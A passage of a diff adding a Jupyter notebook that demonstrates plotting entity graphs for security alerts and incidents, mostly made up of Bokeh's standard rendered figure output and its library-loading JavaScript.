+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1677"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1677', <span id=\"1939\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[LinearAxis(id='1688', ...)],</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='1691', ...), Grid(id='1695', ...), Label(id='1727', ...)],</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;800,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[LinearAxis(id='1692', ...)],</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;'#e5e5e5',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GraphRenderer(id='1712', ...)],</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='1678', ...),</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='1703', ...),</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'right',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;800,</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;Range1d(id='1680', ...),</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;LinearScale(id='1684', ...),</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;Range1d(id='1682', ...),</div></div><div class=\"1938\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;LinearScale(id='1686', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"1939\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"1938\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Figure(id='1677', ...)"
+      ]
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "url_ent = Url({\"Url\": \"www.contoso.com\"})\n",
+    "graph = EntityGraph(url_ent)\n",
+    "graph.plot()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Creating graphs from DataFrames.\n",
+    "It is also possible to create graphs containing multiple alerts or incidents by passing a DataFrame containing incident or alert events to `EntityGraph` this will then convert these to the relevant entity type and plot them all on the one graph.\n",
+    "\n",
+    "<div class=\"alert alert-block alert-info\">\n",
+    "<b>Note:</b> There is also a Pandas accessor for this feature that allows for graph creation and plotting direct from a DataFrame with `df.mp_incident_graph.plot()`\n",
+    "</div>\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1941\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1941\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1941\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1942\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1942\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = 